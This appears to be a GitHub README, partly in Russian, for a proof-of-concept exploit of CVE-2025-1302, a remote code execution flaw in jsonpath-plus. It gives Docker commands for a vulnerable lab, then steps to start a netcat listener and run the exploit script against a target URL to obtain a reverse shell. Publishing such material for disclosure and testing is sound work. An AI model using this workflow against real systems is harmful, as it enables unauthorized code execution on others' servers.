
JSONPath-plus Remote Code Execution
★ CVE-2025-1302 JSONPath-plus RCE PoC ★
https://github.com/user-attachments/assets/5d791540-ef6c-4cd0-bd25-7a1dbbd194fb
docker build -t jsonpath:10.2.0 .
docker run --rm --name jsonpath -p 3000:3000 jsonpath:10.2.0
localhost:3000

Версии пакета jsonpath-plus до 10.3.0 уязвимы к удаленному выполнению кода (RCE) из-за неправильной санитизации ввода. Злоумышленник может выполнить произвольный код в системе, используя небезопасное использование режима eval='safe' по умолчанию. Примечание: Это вызвано неполным исправлением для CVE-2024-21534.
git clone https://github.com/EQSTLab/CVE-2025-1302.git
cd CVE-2025-1302
pip install -r requirements.txt
nc -l -p <LPORT>
python3 CVE-2025-1302.py -u <URL_TO_EXPLOIT> -i <LHOST> -p <LPORT>


Этот репозиторий не предназначен для использования в качестве RCE-эксплойта для CVE-2025-1302. Цель этого проекта — помочь людям узнать об этой уязвимости и, возможно, протестировать свои собственные приложения.
Мы публикуем анализ CVE и вредоносного ПО раз в месяц. Если вам интересно, перейдите по ссылкам ниже, чтобы ознакомиться с нашими публикациями. https://www.skshieldus.com/eng/business/insight.do